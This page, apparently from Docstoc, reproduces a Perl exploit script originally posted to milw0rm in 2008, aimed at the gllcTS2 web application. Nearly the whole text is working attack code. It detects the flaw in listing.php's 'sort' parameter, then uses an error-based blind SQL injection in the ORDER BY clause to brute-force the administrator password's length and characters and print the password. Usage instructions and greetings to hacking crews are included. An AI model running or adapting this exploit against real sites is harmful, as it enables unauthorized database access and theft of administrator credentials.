Docstoc

GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit

Document Sample
GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit Powered By Docstoc
					                            GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                    Page 1/3
      1   #!/usr/bin/perl
      2   ######################
      3   #
      4   #gllcTS2 (listing.php $sort) Remote Blind SQL Injection Exploit
      5   #
      6   ######################
      7   #
      8   #Bug by: h0yt3r
      9   #
  10      ##
  11      ###
  12      ##
  13      #
  14      #This one shows another vulnerability in the gllcTS2. (Thera are many with simple injections)
  15      #Same Versions are affected.
  16      #Also shows the conecpt of how to inject an ORDER BY statement via Blind Injection and
  17      #WITHOUT benchmark(), means we produce an error if the IF statement returns TRUE.
  18      #
  19      #Gr33tz go to:
  20      #b!zZ!t, ramon, thund3r, Free−Hack, Sys−Flaw and of course the neverdying h4ck−y0u Team
  21      #
  22      ################
  23      use LWP::UserAgent;
  24      my $userAgent = LWP::UserAgent−>new;
  25
  26      usage();
  27
  28      $server = $ARGV[0];
  29      $dir = $ARGV[1];
  30
  31
  32      print"\n";
  33      if (!$dir) { die "Read Usage!\n"; }
  34
  35
  36      $filename ="listing.php";
  37
  38      my $vulnCheck = "http://".$server.$dir.$filename;
  39
  40      my $prefix ="";
  41
  42      my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76"
          ,"77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30");
  43
  44      my $Attack= $userAgent−>get($vulnCheck);
  45      if ($Attack−>is_success)
  46      {
  47           print "[x]Attacking ".$vulnCheck."\n";
  48      }
  49      else
  50      {
  51           print "Couldn’t connect to ".$vulnCheck."!";
n/a                                                                                                                        06/13/2008
                            GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                                   Page 2/3
  52         exit;
  53    }
  54
  55    print "[x]Vulnerable Check:";
  56
  57    my $check = $vulnCheck."?sort=’";
  58
  59    my $Attack= $userAgent−>get($check);
  60    if($Attack−>content =~ m/FROM (.*?)_weblist/i)
  61    {
  62         print " Vulnerable!\n";
  63         $prefix = $1;
  64    }
  65    else
  66    {
  67         print " Not Vulnerable!";
  68         exit;
  69    }
  70
  71    my $hex="";
  72    my $length;
  73
  74    print "[x]Bruteforcing Length\n";
  75
  76    my $lengthCounter = 1;
  77    while(1)
  78    {
  79          #To inject ORDER BY (where we cannot union select) we just have to pass a simple IF statement.
  80          #Instead of Benchmark() we can use a subquery which, in this case, would return "Subquery returns more than 1 row
        " if the statement actualle is true.
  81          my $url = "".$vulnCheck."?sort=IF(LENGTH((select admin_pass from ".$prefix."_admin))=".$lengthCounter.",(select 1 union select 5),null)&
        direction=desc&showgroup=all";
  82          my $Attack= $userAgent−>get($url);
  83          my $content = $Attack−>content;
  84          if($content =~ m/Please contact a the site admin immediately./i)
  85          {
  86               $length=$lengthCounter;
  87               last;
  88          }
  89          else
  90          {
  91               $lengthCounter++;
  92          }
  93    }
  94
  95
  96    print "[x]Injecting Black Magic\n";
  97
  98    for($b=1;$b<=$length;$b++)
  99    {
  100       for(my $u=0;$u<28;$u++)
  101       {
n/a                                                                                                                                        06/13/2008
                           GLLCTS2 listing.php sort Remote Blind SQL Injection Exploit                                                        Page 3/3
  102                my $url = "".$vulnCheck."?sort=IF(substring((select admin_pass from ".$prefix."_admin),".$b.",1)=0x".$Daten[$u].",(select 1 union sel
        ect 5),null)&direction=desc&showgroup=all";
  103
  104             my $Attack= $userAgent−>get($url);
  105
  106             my $content = $Attack−>content;
  107
  108             if($content =~ m/Please contact a the site admin immediately./i)
  109             {
  110                 print "[x] Found Char ".$Daten[$u]."\n";
  111                 $hex=$hex.$Daten[$u];
  112                 last;
  113             }
  114
  115             else
  116             {
  117                  #Whatever...
  118             }
  119        }
  120   }
  121
  122   print "[x]Converting \n";
  123   my $a_str = hex_to_ascii($hex);
  124
  125   print "[x]Success! \n";
  126   print " Adminpassword: $a_str\n";
  127
  128   sub hex_to_ascii ($)
  129   {
  130           (my $str = shift) =~ s/([a−fA−F0−9]{2})/chr(hex $1)/eg;
  131           return $str;
  132   }
  133
  134   sub usage()
  135   {
  136       print q
  137       {
  138       ######################################################
  139                 gllcTS2 Remote Blind SQL Injection Exploit
  140                            −Written by h0yt3r−
  141       Usage: gllcts2.pl [Server] [Path]
  142       Sample:
  143       perl gllcts2.pl www.site.com /cms/
  144       ######################################################
  145       };
  146
  147   }
  148
  149   # milw0rm.com [2008−06−13]



n/a                                                                                                                                            06/13/2008

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:29
posted:5/23/2010
language:English
pages:3